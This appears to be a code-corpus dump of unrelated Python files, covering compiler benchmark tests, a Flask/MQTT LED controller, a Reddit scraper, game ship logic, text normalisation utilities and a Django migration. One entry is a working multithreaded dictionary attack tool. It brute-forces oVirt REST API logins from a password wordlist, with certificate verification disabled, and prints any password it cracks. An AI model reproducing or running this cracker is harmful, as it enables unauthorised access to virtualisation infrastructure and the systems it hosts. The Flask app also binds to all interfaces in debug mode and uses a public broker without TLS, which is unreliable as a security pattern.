"""Test a command line that contains both source files and precompiled
object files. The object files should be filtered from compilation but
used for the final link.
"""
with temporary_working_directory():
with open("a.c", "w") as f:
f.write(
"""
#include "b.h"
int A() {
return B();
}
int main() {
return A();
}
"""
)
with open("b.c", "w") as f:
f.write(f"int B() {{ return {retcode}; }}")
with open("b.h", "w") as f:
f.write("int B();")
# Compile b.c to object file:
subprocess.check_call([str(llvm_paths.clang_path()), "b.c", "-c"], timeout=60)
assert (Path("b.o")).is_file()
bm = env.make_benchmark_from_command_line(["gcc", "a.c", "b.o", "-o", "foo"])
env.reset(benchmark=bm)
bm.compile(env)
assert Path("foo").is_file()
p = subprocess.Popen(["./foo"])
p.communicate(timeout=60)
assert p.returncode == retcode
def test_make_benchmark_from_command_line_only_object_files(env: LlvmEnv):
with temporary_working_directory():
with open("a.c", "w") as f:
f.write("int A() { return 5; }")
# Compile b.c to object file:
subprocess.check_call([str(llvm_paths.clang_path()), "a.c", "-c"], timeout=60)
assert (Path("a.o")).is_file()
with pytest.raises(
ValueError, match="Input command line has no source file inputs"
):
env.make_benchmark_from_command_line(["gcc", "a.o", "-c"])
if __name__ == "__main__":
main()
|
996,877 | 0daeed2ec34474a3e16f8ba2d1dedb98bfc0abfb | from flask import Flask, render_template, flash, redirect, request, url_for
from flask_mqtt import Mqtt
from flask_socketio import SocketIO
import ssl
import subprocess
import atexit
import time
import json
from config import *
# Activate python enviroment:
# source venv/bin/activate
# Deactivate python enviroment:
# deactivate
# =========================================================================
# Global Variables:
x_loc = 0
y_loc = 0
intensity = 0.7
r_val = 255
b_val = 255
g_val = 255
num_leds = 300
length = 5 #(in meters)
leds_per_m = num_leds/length
mode = "Localized"
radius = 10
# Using Development Broker
# # =========================================================================
# # Start the MQTT broker in another thread:
# # Service stopped in the exithandler function (CTRL-C)
# # verify with 'netstat -at'
# subprocess.Popen('sudo mosquitto -c mosquitto.conf', shell=True)
# # Sleep to allow password to be entered (TODO - find a better way)
# time.sleep(5)
# subprocess.Popen('python3 on-server-client.py')
# =========================================================================
# Start the Flask App and Configure MQTT
app = Flask(__name__)
# Development Broker Used Instead
# app.config['MQTT_BROKER_URL'] = '0.0.0.0'
# app.config['MQTT_BROKER_PORT'] = 8883
app.config['MQTT_BROKER_URL'] = 'broker.hivemq.com'
app.config['MQTT_BROKER_PORT'] = 1883
app.config['MQTT_USERNAME'] = ''
app.config['MQTT_PASSWORD'] = ''
app.config['MQTT_REFRESH_TIME'] = 0.1 # refresh time in seconds
# TLS Settings
app.config['MQTT_TLS_ENABLED'] = False
# Using Development Broker Instead without TLS
# app.config['MQTT_TLS_ENABLED'] = True
# app.config['MQTT_TLS_INSECURE'] = True
# app.config['MQTT_TLS_VERSION'] = ssl.PROTOCOL_TLSv1_2
# app.config['MQTT_TLS_CA_CERTS'] = '/etc/mosquitto/ca_certificates/ca.crt'
mqtt = Mqtt(app)
socketio = SocketIO(app)
app.secret_key = SECRET
# =========================================================================
# ****************************HTML Pages***********************************
# =========================================================================
# Startpage
@app.route('/')
def startpage():
return render_template('startpage.html')
@app.route('/console_log')
def console_log():
return render_template('console_log.html')
@app.route('/mapping')
def mapping():
return render_template('mapping.html')
@app.route('/settings', methods=['GET', 'POST'])
def settings():
global r_val, g_val, b_val, intensity, num_leds, mode, radius
form_vals = [r_val, g_val, b_val, intensity, num_leds, mode, radius]
# get user input
if request.method == 'POST':
inputs = request.form
for setting in inputs:
print(setting)
if setting in ['redid', 'greenid', 'blueid']:
if int(inputs[setting]) >= 0 and int(inputs[setting]) <= 255:
if setting == 'redid':
r_val = int(inputs[setting])
if setting == 'greenid':
g_val = int(inputs[setting])
if setting == 'blueid':
b_val = int(inputs[setting])
if setting == 'intensityid':
intensity = float(inputs[setting])
if setting == 'numberid':
if int(inputs[setting]) >= 0 and int(inputs[setting]) <= 300:
num_leds = int(inputs[setting])
if setting == 'radiusid':
if int(inputs[setting]) >= 0 and int(inputs[setting]) <= num_leds:
radius = int(inputs[setting])
if setting == 'modeid':
mode = inputs[setting]
payload = json.dumps(dict(
red=r_val,
green=g_val,
blue=b_val,
brightness=intensity,
number= num_leds,
mode=mode
))
mqtt.publish('configurations/strip1', payload, 1)
return redirect(url_for('console_log'))
return render_template('settings.html', form_vals=form_vals)
# =========================================================================
# **************************MQTT Functions*********************************
# =========================================================================
@mqtt.on_message()
def handle_mqtt_message(client, userdata, message):
data = dict(
topic=message.topic,
payload=message.payload.decode()
)
print('\nGot A message\n')
socketio.emit('mqtt_rec', data=data)
location_processing(data)
@mqtt.on_log()
def handle_logging(client, userdata, level, buf):
print(level, buf)
@mqtt.on_connect()
def handle_connect(client, userdata, flags, rc):
mqtt.subscribe('lights/strip1')
@mqtt.on_publish()
def handle_publish(client,userdata,result):
print('data published')
socketio.emit('mqtt_pub', data=data)
# =========================================================================
# ***************************Helper Functions******************************
# =========================================================================
# Called when CTRL-C is pressed to cleanly stop the MQTT broker
def exit_handler():
# print('\nStopping Mosquitto')
# subprocess.Popen('service mosquitto stop', shell=True)
print('The application is closing')
def location_processing(data):
global optional
if mode == 'Localized':
pass # TODO: Not implemented yet
elif mode == 'Perpendicular':
optional = float(data['payload'])
elif mode == 'Parallel':
optional = float(data['payload'])
elif mode == 'Solid':
pass # Don't actually need to do anything
def lighting_processing(data):
new_data = json.dumps(dict( # encodes the dictionary as a json to send
x=x_loc,
y=y_loc
))
mqtt.publish('locations/strip1', new_data, 1)
# =========================================================================
# Start up the app
if __name__ == '__main__':
atexit.register(exit_handler)
socketio.run(app, host='0.0.0.0', use_reloader=True, debug=True)
|
996,878 | 5ea4f36b0bdd255c3b0b2cb41468d0c8f7ce269f | #!/usr/bin/python3
import linecache
import ovirtsdk4 as sdk
import argparse
import threading
import time
cracked = False
def ovirt_login_wrapper(url, username, password):
return sdk.Connection(url=url,
username=username,
password=password,
insecure=True).test()
def passwd_dict_linecount(dic_file):
return sum(1 for line in open(dic_file))
def range_tuples(num, divide):
divide_list = list(range(1, num, int(num / divide))) + [num]
return list(zip(divide_list[0:-1], divide_list[1:]))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--login', help='Login user')
parser.add_argument('-d', '--dictionary', help='The password dictionary')
parser.add_argument('-u', '--url', help='The rest api url')
parser.add_argument('-t', '--threads', type=int, default=2, help='Threads numbers')
args = parser.parse_args()
threads_num = args.threads
line_num = passwd_dict_linecount(args.dictionary)
line_range_tuples = range_tuples(line_num, threads_num)
def ovirt_crack(line_tuple):
global cracked
for line in range(line_tuple[0], line_tuple[1]):
password = linecache.getline(args.dictionary, line)
print("Trying password: %s" % password)
if ovirt_login_wrapper(args.url, args.login, password):
cracked = True
print("The password is cracked: %s\n" % password)
threads = [threading.Thread(target=ovirt_crack, args=(line_tuple,)) for line_tuple in line_range_tuples]
for t in threads:
t.start()
global cracked
while len(threading.enumerate()) > 1 and not cracked:
time.sleep(1)
for t in threads:
t.join()
print("password not found in dictionary\n")
if __name__ == "__main__":
main()
|
996,879 | 4155a5365df16ba7608d1cf669befaca6d7b1b57 | def powerof2(n):
# base cases
# '1' is the only odd number
# which is a power of 2(2^0)
if n == 1:
return True
# all other odd numbers are not powers of 2
elif n%2 != 0 or n == 0:
return False
#recursive function call
return powerof2(n/2)
# Driver Code
if __name__ == "__main__":
print(powerof2(64)) #True
print(powerof2(12)) #False |
996,880 | 69f054f4823c62780e974cb7b2ef786e80d8db85 | import mxnet as mx
import cv2
from collections import namedtuple
from os.path import join
from mxnet import nd
import numpy as np
import pdb
import matplotlib.pyplot as plt
import sys
##from dataset_loader import DatasetLoader
def format_image(image):
'''Detecte face (using OpenCV cascade classifier) from given frame, and format to Mxnet input format'''
if len(image.shape) > 2 and image.shape[2] == 3:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
else:
image = cv2.imdecode(image, cv2.CV_LOAD_IMAGE_GRAYSCALE)
faces = cascade_classifier.detectMultiScale(
image,
scaleFactor=1.3,
minNeighbors=5
)
# None is we don't found an image
if not len(faces) > 0:
return None
max_area_face = faces[0]
for face in faces:
if face[2] * face[3] > max_area_face[2] * max_area_face[3]:
max_area_face = face
# Chop image to face
face = max_area_face
image = image[face[1]:(face[1] + face[2]), face[0]:(face[0] + face[3])]
# Resize image to network size
try:
image = cv2.resize(image, (input_height, input_width),
interpolation=cv2.INTER_CUBIC) / 255.
except Exception:
print("[+] Problem during resize")
return None
# cv2.imshow("Lol", image)
# cv2.waitKey(0)
image = nd.array(image).expand_dims(-1).transpose((2, 0, 1)).expand_dims(0)
return image
def load_images(img):
'''Duplicated'''
if type(img)==str:
frame = cv2.imread(img)
else: #video frame
frame = img
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
img = cv2.resize(img,(input_height, input_width),interpolation=cv2.INTER_CUBIC)
img = nd.array(img).expand_dims(-1).transpose((2,0,1)).expand_dims(0)
return img, frame
def draw_bars(frame, result, feelings_faces):
'''Draw visulization bars'''
if result is None:
print('prob shuold not bereturnne Type. Please check...')
return
for index, emotion in enumerate(EMOTIONS):
cv2.putText(frame, emotion, (10, index * 22 + 20),
cv2.FONT_HERSHEY_PLAIN, 0.5, (0, 255, 0), 1)
cv2.rectangle(frame, (130, index * 22 + 10),
(130 + int(result[0][index] * 100),
(index + 1) * 22 + 4), (255, 0, 0), -1)
face_image = feelings_faces[np.argmax(result[0])]
# decoration
for c in range(0, 3):
frame[EMOJI_H:EMOJI_H+EMOJI_SIZE, EMOJI_R:EMOJI_R+EMOJI_SIZE, c] = \
face_image[:, :, c] * (face_image[:, :, 3] / 255.0) + \
frame[EMOJI_H:EMOJI_H+EMOJI_SIZE, EMOJI_R:EMOJI_R+EMOJI_SIZE, c] * (1.0 - face_image[:, :, 3] / 255.0)
if len(sys.argv)>1:
plt.imshow(frame[...,::-1])
plt.show()
else:
cv2.imshow('FER', frame)
CASC_PATH = 'CASC/haarcascade_frontalface_default.xml'
EMOJI_H, EMOJI_R = 160, 10
EMOJI_SIZE = 80
model_prefix = 'models/My_FER_model'
num_epoch = 10000
input_width, input_height = 48, 48
cascade_classifier = cv2.CascadeClassifier(CASC_PATH)
EMOTIONS = ['angry', 'disgusted', 'fearful',
'happy', 'sad', 'surprised', 'neutral']
def get_emojis(EMOTIONS):
feelings_faces = []
for index, emotion in enumerate(EMOTIONS):
feelings_faces.append(cv2.resize(cv2.imread('../emojis/' + emotion + '.png', -1), (80, 80)))
return feelings_faces
def build_model(model_prefix, num_epoch):
sym, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, num_epoch)
data = mx.sym.Variable(name='data')
mod = mx.mod.Module(symbol=sym, context=mx.cpu(0), label_names=None)
mod.bind(for_training=False, data_shapes=[('data',(1,1,input_height,input_width))])
mod.set_params(arg_params, aux_params, allow_missing=True)
Batch = namedtuple('Batch', ['data'])
return mod, Batch
if len(sys.argv)>1:
mod, Batch = build_model(model_prefix, num_epoch)
frame = cv2.imread(sys.argv[1])
img = format_image(frame)
mod.forward(Batch([nd.array(img)]))
prob = mod.get_outputs()[0].asnumpy()
print('predictions: {0}'.format(list(zip(EMOTIONS,list(prob[0])))))
feelings_faces = get_emojis(EMOTIONS)
draw_bars(frame, prob, feelings_faces) |
996,881 | 21c9d83241175693af3598597a21bb1a8e3623ab | import numpy as np
import pandas as pd
from pandas import DataFrame, Series
import praw
import re
import time
rscotch = pd.read_csv('rscotch.csv')
new_cols = rscotch.columns.values
new_cols[1] = 'name'
new_cols[3] = 'link'
new_cols[2] = 'user'
for i in range(len(new_cols)):
new_cols[i] = new_cols[i].lower()
rscotch = DataFrame(rscotch, columns = new_cols)
urls = [url for url in rscotch.link.values]
'''
NEED TO USE A REDDIT USERNAME HERE
'''
user_agent = ("scotch review bot 0.1 by /u/YOUR_USERNAME_HERE")
r = praw.Reddit(user_agent = user_agent)
initialTime = time.time()
for i in rscotch.index:
if i % 50 == 0:
update = time.time()
print update - initialTime
try:
link = rscotch.link[i]
submission = r.get_submission(link)
forest_comments = submission.comments
review = forest_comments[0]
rscotch.ix[i, 'reviewText'] = review
except:
rscotch.ix[i, 'reviewText'] = 'invalid url?'
def convertReviews(review):
if review != 'invalid url?':
return review.body
else: return 'invalid url?'
rscotch['review'] = rscotch['reviewText'].apply(convertReviews)
rscotch.drop('reviewText', 1)
rscotch.to_csv('rscotch_reviews.csv', encoding = 'utf-8')
|
996,882 | c3e00c28f488cda379c3168cd09f0d1295da33ba | #!/bin/env dls-python
from pkg_resources import require
require("mock")
require("cothread")
import unittest
import sys
import weakref
import os
import cothread
import logging
#logging.basicConfig(level=logging.DEBUG)
# Module import
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from malcolm.core.base import weak_method
class Loop(object):
def __init__(self, outs):
self.outs = outs
self.i = 0
self.stop_requested = cothread.Event(auto_reset=False)
self.proc = cothread.Spawn(weak_method(self.event_loop))
self.status = 0
def loop_event(self):
if self.stop_requested:
raise StopIteration
cothread.Sleep(0.01)
self.outs.append(self.i)
self.i += 1
def event_loop(self):
while True:
try:
weak_method(self.loop_event)()
except ReferenceError:
return
self.status = 1
def __del__(self):
self.stop_requested.Signal()
self.proc.Wait()
class LoopTest(unittest.TestCase):
def test_loop_del_called_when_out_of_scope(self):
self.outs = []
l = Loop(self.outs)
cothread.Sleep(0.1)
self.assertEqual(self.outs, [0, 1, 2, 3, 4, 5, 6, 7, 8])
l = None
cothread.Sleep(0.1)
self.assertEqual(self.outs, [0, 1, 2, 3, 4, 5, 6, 7, 8])
if __name__ == '__main__':
unittest.main(verbosity=2)
|
996,883 | a0d2b29b5baac76ca6fb50dd4097121fb44b457a | # Generated by Django 2.0.1 on 2018-01-31 01:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0012_auto_20180130_1922'),
]
operations = [
migrations.AlterField(
model_name='event',
name='maps_url',
field=models.URLField(blank=True, null=True),
),
migrations.AlterField(
model_name='event',
name='venue',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
|
996,884 | f42c5c9dcec1e8d01deb1c54aecc9df5392c26b7 | from colors import PICO_DARKGRAY, PICO_PINK, PICO_WHITE
from v2 import V2
from animrotsprite import AnimRotSprite
import random
import math
import particle
import bullet
import helper
from healthy import Healthy
FLEET_RADIUS = 15
TARGET_POWER = 4
FLEET_HEADING_POWER = 1
FLEET_SEPARATION_POWER = 1
FLEET_SEPARATION_DEGRADE = 100
FLEET_SEPARATION_MAX = 12
FLEET_PROXIMITY_POWER = 1
WARP_DRIVE_TIME = 30.0
WARP_PLANET_MIN_DIST = 15
BASE_HEALTH = 10
THRUST_PARTICLE_RATE = 0.25
# Particle effects
class Ship(AnimRotSprite, Healthy):
def __init__(self, scene, pos, owning_civ, sheet):
AnimRotSprite.__init__(self, pos, sheet, 12)
self.base_speed = 7
self.scene = scene
self.owning_civ = owning_civ
self.target = None
self.offset = (0.5,0.5)
self.speed_t = random.random() * 6.2818
self._layer = 2
self.velocity = V2(0,0)
self.push_velocity = V2(0,0)
self.orbits = True
self.collidable = True
self.collision_radius = 1
self.thrust_particle_time = 0
self._recalc_rect()
self.warp_drive_countdown = 0
self.warp_drive_t = 0
self.base_health = BASE_HEALTH
self.size = 2
Healthy.__init__(self, self.scene, (14,3))
def get_max_health(self):
return self.base_health * (1 + self.owning_civ.upgrade_stats['ship_health'])
def update(self, dt):
self.health_bar.pos = self.pos + V2(0, -self.height / 2)
if self.health <= 0:
self.kill()
self.warp_drive_countdown -= dt
self.push_from_planets(dt)
AnimRotSprite.update(self,dt)
def push_from_planets(self,dt):
for planet in self.scene.get_planets():
dist = (planet.pos - self.pos).sqr_magnitude()
if dist < (planet.get_radius() + 5) ** 2:
delta = (self.pos - planet.pos)
dir = delta.normalized()
mag = abs((planet.get_radius() + 5) - delta.magnitude())
fwd = V2.from_angle(self._angle)
self.push_velocity = dir * mag
w = fwd.cross(dir)
if w > 0:
self._angle += 5 * dt
self.push_velocity += V2(dir.y, -dir.x) * 2
else:
self._angle -= 5 * dt
self.push_velocity -= V2(dir.y, -dir.x) * 2
self.push_velocity *= 0.9
def default_update(self, dt):
self.travel_to_target(dt)
self._update_image()
def can_land(self, p):
return p.owning_civ == self.owning_civ and p == self.target
def turn_towards(self, vector, dt):
facing = V2.from_angle(self._angle)
cp = facing.cross(vector)
try:
ao = math.acos(facing.dot(vector))
except ValueError:
ao = 0
if ao < 0.25:
self._angle = math.atan2(vector.y, vector.x)
else:
if cp > 0:
self._angle += 3 * dt
else:
self._angle -= 3 * dt
return cp
def try_warp(self, dt):
if self.owning_civ.upgrade_stats['warp_drive'] == 0:
return
if self.warp_drive_countdown > 0:
return
towards = (self.target.pos - self.pos).normalized()
nearest,dist = helper.get_nearest(self.pos, self.scene.get_planets())
if nearest:
if dist < (nearest.get_radius() + WARP_PLANET_MIN_DIST) ** 2:
return
if self.warp_drive_t < 0.66:
self.velocity = V2(0,0)
self.warp_drive_t += dt
if int(self.warp_drive_t * 40) % 2 == 0:
pvel = V2(random.random() - 0.5, random.random() - 0.5) * 15
pvel -= towards * 25
p = particle.Particle([PICO_WHITE, PICO_PINK],1,self.pos,0.25 + random.random() * 0.25,pvel)
self.scene.game_group.add(p)
return
exit_dist = (self.target.pos - self.pos).magnitude() - self.target.get_radius() - WARP_PLANET_MIN_DIST
max_dist = self.owning_civ.upgrade_stats['warp_drive'] + 30
dist = min(exit_dist, max_dist)
print(dist)
for i in range(0, int(dist), 4):
p = self.pos + towards * i
pvel = V2(random.random() - 0.5, random.random() - 0.5) * 15
pvel += towards * 15
p = particle.Particle([PICO_WHITE, PICO_PINK],1,p,0.25 + random.random() * 0.5,pvel)
self.scene.game_group.add(p)
nearest,d = helper.get_nearest(p, self.scene.get_planets())
if nearest and d < (nearest.get_radius() + WARP_PLANET_MIN_DIST) ** 2:
dist = i
break
self.warp_drive_t = 0
self.pos = self.pos + towards * dist
print(towards, dist, self.pos)
self.warp_drive_countdown = WARP_DRIVE_TIME * (dist / max_dist)
def travel_to_target(self, dt):
### Directional Forces ###
target_vector = V2(0,0)
# Towards target
if self.orbits:
orbital_pos = (self.pos - self.target.pos).normalized() * (self.target.size + 20) + self.target.pos
towards_angle = (orbital_pos - self.pos).to_polar()[1]
else:
towards_angle = (self.target.pos - self.pos).to_polar()[1]
towards_angle += math.sin(self.speed_t) / 4
target_vector += V2.from_angle(towards_angle) * TARGET_POWER
target_vector += self.get_fleet_target_vector()
# Now turn towards that target vector
target_vector = target_vector.normalized()
self.turn_towards(target_vector, dt)
self.speed_t += dt
speed = math.sin(self.speed_t) * 2 + self.base_speed
speed *= self.owning_civ.upgrade_stats['move_speed'] + 1
self.velocity = V2.from_angle(self._angle) * speed
self.try_warp(dt)
self.pos += (self.velocity + self.push_velocity) * dt
if self.velocity.sqr_magnitude() > 0:
self.thrust_particle_time += dt
if self.thrust_particle_time > THRUST_PARTICLE_RATE:
pvel = V2(random.random() - 0.5, random.random() - 0.5) * 5
pvel += -self.velocity / 2
p = particle.Particle("assets/thrustparticle.png",1,self.pos + -self.velocity.normalized() * self.size,1,pvel)
self.scene.game_group.add(p)
self.thrust_particle_time -= THRUST_PARTICLE_RATE
def get_fleet_target_vector(self):
target_vector = V2(0,0)
our_ships = self.scene.get_civ_ships(self.owning_civ)
fleet_ships = [s for s in our_ships if (s.pos - self.pos).sqr_magnitude() <= FLEET_RADIUS ** 2]
fleet_ships.remove(self)
# Separation
for ship in fleet_ships:
delta = ship.pos - self.pos
sm = delta.sqr_magnitude()
if sm < FLEET_SEPARATION_MAX ** 2:
target_vector -= (delta.normalized() * (FLEET_SEPARATION_DEGRADE / sm)) * FLEET_SEPARATION_POWER
# Proximity
center = V2(0,0)
for ship in fleet_ships:
center += ship.pos / len(fleet_ships)
delta = center - self.pos
target_vector += delta.normalized() * FLEET_PROXIMITY_POWER
return target_vector
def kill(self):
self.health_bar.kill()
super().kill() |
996,885 | 8ebe10b35e358eb2dcef80d741d69d3bf59ed6da | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Set de funciones para normalización de textos.
Created on Wed Aug 20 2014
Modified by analysis on Thu Aug 28 2014
Finish on (esto espera a que termine el experimento 14)
.. version: 0.2
.. release: 0.2-RC1
.. author: Abel Meneses abad
"""
import re, os
import string
LETTERS = ''.join([string.ascii_letters,'ñÑáéíóúÁÉÍÓÚüÜ'])
def url_string_recognition_support(text):
for i in re.finditer('www\S*(?=[.]+?\s+?)|www\S*(?=\s+?)|http\S*(?=[.]+?\s+?)|http\S*(?=\s+?)',text):
for j in range(i.start(),i.end()):
if text[j] in string.punctuation:
text = text[:j]+'_'+text[j+1:]
return text
def punctuation_filter(text):
#Asociados a signos de puntuación
text = re.sub('\xc2|\xa0',' ',text)
text = re.sub('\\xe2\\x80\\x9d|\\xe2\\x80\\x9c',' ',text) #Del “” en ascii.
text = re.sub(u'\u2022',' . ',text) #Viñeta tamaño medio.
text = re.sub(u'\u201c|\u201d',' ',text) #Del “” en utf8.
text = re.sub('\\xe2\\x80\\x99|\\xe2\\x80\\x98','\'',text) # Del ‘’ en ascii.
text = re.sub(u'\u2018|\u2019','\'',text) # Del ‘’ en unicode
text = re.sub('\\xe2\\x80\\x93',' - ',text) # Elimina guion largo ó – en ascii.
text = re.sub(u'\u2013|\u2014|\u2015|\u2212',' - ',text) #Guión largo codificación utf8.
#~ text = re.sub('["]|[\']',' ',text) #Del comillas dobles y simples sin decodificar.
text = re.sub(u'\u25cf',' . ',text) #Viñeta gigante.
text = re.sub(u'\u2026','...',text) #Tres puntos.
text = re.sub(u'\u2192','->',text) #Flecha sentido a la derecha.
text = re.sub(u'\u2190','<-',text) #Flecha sentido a la izquierda.
text = re.sub(u'\u2193|\u2191|\u2195',' ',text) #Flecha sentido hacia abajo/arriba.
text = re.sub(u'\u2217','*',text) #Asterisco.
text = re.sub(u'\u200b|\u21a8',' ',text) #Espacio en blanco o algo así.
text = re.sub(u'\x0c','\n',text) #Caracter de control aparece a veces al inicio de un epígrafe
#Based on letters
text = re.sub(u'\ufb01','fi',text) #Error que introduce pdf2txt en el string 'fi'
text = re.sub(u'\ufb00|\ufb03','ff',text) #Error que introduce pdf2txt en el string 'ff'
text = re.sub(u'\ufb02','fl',text) #Error que introduce pdf2txt en el string 'ff'
text = re.sub(u'\ufb04','nl',text) #Error que introduce pdf2txt en el string 'nl'
#Todo: faltan más letras pero en Getting Real no están.
#Greek symbols
text = re.sub(u'\u03bb','Lambda',text) #Letras griegas.
text = re.sub(u'\u03b8|\u0398','Theta',text) #Letras griegas.
text = re.sub(u'\u03bc','My',text) #Letras griegas.
text = re.sub(u'\u03b5|\u0395|\u03ad','Epsilon',text) #Letras griegas.
text = re.sub(u'\u03b1','Alfa',text) #Letras griegas.
text = re.sub(u'\u03b4|\u0394','Delta',text) #Letras griegas.
text = re.sub(u'\u03b9','Iota',text) #Letras griegas.
text = re.sub(u'\u03ba|\u039a','Kappa',text) #Letras griegas.
text = re.sub(u'\u03bd','Ny',text) #Letras griegas.
text = re.sub(u'\u03c0','Pi',text) #Letras griegas.
text = re.sub(u'\u03c1','Ro',text) #Letras griegas.
#~ text = re.sub(u'\u03c2','P',text) #Letras griegas.
text = re.sub(u'\u03c3|\u03a3','Sigma',text) #Letras griegas.
text = re.sub(u'\u03c4','Tau',text) #Letras griegas.
text = re.sub(u'\u03c5','Ipsilon',text) #Letras griegas.
text = re.sub(u'\u03c6|\u03a6','Fi',text) #Letras griegas.
text = re.sub(u'\u03c9|\u03a9','Omega',text) #Letras griegas.
text = re.sub(u'\u03cc|\u03bf','Omicron',text) #Letras griegas.
text = re.sub(u'\u03c2','Dseta',text) #Letras griegas.
#Math symbols
text = re.sub(u'\u2260',' no-igual ',text) #desigual.
text = re.sub(u'\u2229',' intersect ',text) #.
text = re.sub(u'\u2264',' menor-o-igual ',text) #.
text = re.sub(u'\u2265',' mayor-o-igual ',text) #.
text = re.sub(u'\u2208',' existe ',text) #.
text = re.sub(u'\u211d',' reales ',text) #.
text = re.sub(u'\u2248',' aproximadamente-igual-a ',text) #.
text = re.sub(u'\u266f','#',text) #.
text = re.sub(u'\u2032','-',text) # Grados
text = re.sub(u'\u2033','"',text) #
text = re.sub(u'\u2219','*',text) #
text = re.sub(u'\u2261',' congruente ',text) #
text = re.sub(u'\uf0ce',' en ',text) #
#Foreing chars
text = re.sub(u'\u010d','c',text) #
text = re.sub(u'\u0107','c',text) #
text = re.sub(u'\u015b|\u0161','s',text) #
text = re.sub(u'\u0155','r',text) #
text = re.sub(u'\u010c','C',text) #
text = re.sub(u'\u016f','u',text) #
text = re.sub(u'\u0141','L',text) #
text = re.sub(u'\u011b','e',text) #
text = re.sub(u'\u0151','o',text) #
#Fonetics chars
text = re.sub(u'\u02d0','_',text) #
text = re.sub(u'\u0261','g',text) #
text = re.sub(u'\u0279|\u0159','r',text) #
text = re.sub(u'\u025b','e',text) #
return text
def del_contiguous_point_support(text):
for i in re.finditer('[.]\s*?[.]+?[\s|[.]]*',text):
for j in range(i.start(),i.end()):
if text[j] == '.' or text[j]==' ':
text = text[:j]+' '+text[j+1:]
text = re.sub('[.]\s*\n',' .\n ',text) #Garantizo que todos los puntos al final de las oraciones seran separados por si hay algun acronimo.
return text
def contiguos_string_recognition_support(text):
text = re.sub('[.](?=\w+?)|-(?=\w+?)|@(?=\w+?)','_',text)
#Added for Llanes, is under analisis if it most be here.
text = re.sub('[.](?=,)|[.](?=\')|[.](?=;)|[.][[]|[.][]]',' ',text) #Este hay que modificarlo si vamos a usar abbrev
text = re.sub('[.][)](?=\s*\n)|[.]["](?=[\s|)]*\n)|[.][:](?=\s*\n)','. ',text) #Este modificarlo si vamos a usar el replacers1
text = re.sub('[.][)](?=\s*\w)|[.]["](?=\s*[\w)[])|[.][:](?=\s*\w)','. ',text) #Este modificarlo si vamos a usar el replacers1
text = re.sub('[.][)](?=\s*[.])|[.][)](?=[,])',')',text)
text = re.sub('[.][)](?=\s*")|[.]["](?=\s*")','. ',text)
text = re.sub('[.]["](?=\s*[.])|[.][:](?=\s*")',' ',text)
text = re.sub('[?!]','. ',text)
#~ text = re.sub('(\w+)(?=\n)','\g?<1> .\n', text)
return text
def abbrev_recognition_support(text):
#TODO primero verificar que la palara en el doc tiene un . y entonces comparar con abbrev
#Ej if '.' in 'U.S.': print 'True'
propname = 'A. B. C. D. E. F. G. H. I. J. K. L. M. N. O. P. Q. R. S. T. U. V. W. X. Y. Z.'
abbrev = ' Dr. Ms.C. Ph.D. Ing. Lic. U.S. U.S Corp. N.Y. N.Y L.A. a.m. B.C. D.C. O.K. O.K B.C L.A '
#Proper names acronyms OK
print ('Proper names preprocessing')
for i in re.finditer('\s[A-Z](?=[.][\s|,|\'|)])|\n[A-Z](?=[.][\s|,|\'|)])',text):
frag = text[i.start()+1:i.end()+1]
if find(propname,frag) != -1:
frag = frag.replace('.','_')
text = text[:i.start()+1]+frag+text[i.end()+1:]
#Abbreviations and acronyms recognition OK
print ('Acronyms recognition')
#for i in re.finditer('\s[a-zA-Z.]*(?=[.][\s|,|\'|)])|\n[a-zA-Z.]+(?=[.][\s|,|\'|)])',text):
# frag = text[i.start()+1:i.end()+1]
# if find(abbrev,frag) != -1 and frag != '.':
# frag = frag.replace('.','_')
# text = text[:i.start()+1]+frag+text[i.end()+1:]
text = re.sub('U[.]S[.]|U[.]S','U_S_',text)
text = re.sub('L[.]A[.]|L[.]A','L_A_',text)
text = re.sub('N[.]Y[.]|N[.]Y','N_Y_',text)
print ('50\%')
text = re.sub('B[.]C[.]|B[.]C','B_C_',text)
text = re.sub('O[.]K[.]|O[.]K','O_K_',text)
text = re.sub('A[.]M[.]|A[.]M|a[.]m[.]|a[.]m','a_m_',text)
text = re.sub('A[.]I[.]|A[.]I','A_I_',text)
#Quedará pendiente solo el caso en que la abreviatura esté al final de la oración, y continúe otra oración del párrafo. En esta situación el punto de la abreviatura es el punto final por regla gramatical. Ver como hice para separar en la linea 114
return text
def del_char_len_one(text):
text = re.sub('\s\w\s',' ',text)
return text
def add_text_end_dot(text):
"""
.. function:: add_text_end_dot
Procede de clean punctuation, pero ha sido despojada de todas sus funciones exceptuando la de agregar un punto al final del texto.
Esta función ha sido rediseñada a partir de considerar que es el primer paso después de tener seccionado el texto al que se tratará con NLP.
:param text: text to process.
:param type: string.
:returns text: The last char will be a dot, this is important for other functions that need to process the last sentence.
.. author: Abel Meneses abad
Created on Fri, 28 Feb 2014
Modify on Son Dic 6 2015
Finish on XXXXX 2014
.. release: 0.2
"""
# Este fragmento de código coloca un punto en el final del texto. Objetivo: luego hay funciones que necesitan que el último caracter sea el punto final de la última oración.
first_end_dot = text.rfind('.') # posición del último punto final
fragment = text[first_end_dot+1:] # fragmento final después del punto
A = set(LETTERS)
B = set(fragment)
if len(B.intersection(A)) != 0: #si hay letras válidas en el fragmento
text += ' .'
return text
|
996,886 | 6777a215f3284cdb9e7d206295c53516661467bf | import inspect
import os
import shutil
import luigi
projdir_struct = {
'bin':None,
'conf':None,
'doc' :
{ 'paper': None },
'experiments' :
{ '2000-01-01-example' :
{ 'audit':None,
'bin':None,
'conf':None,
'data':None,
'doc':None,
'lib':None,
'log':None,
'raw':None,
'results':None,
'run':None,
'tmp':None }},
'lib':None,
'raw':None,
'results':None,
'src':None }
def get_file_dir():
return os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
def print_dirs(dir_structure, padding, padstep):
if type(dir_structure) is dict:
for k,v in dir_structure.iteritems():
print str(' ' * padding) + k
print_dirs(v, padding+padstep, padstep)
def create_dirs(dirtree):
if type(dirtree) is dict:
for dir,subtree in dirtree.iteritems():
print('Creating ' + dir + ' ...')
os.makedirs(dir)
if subtree is not None:
os.chdir(dir)
create_dirs(subtree)
os.chdir('..')
def print_and_create_projdirs():
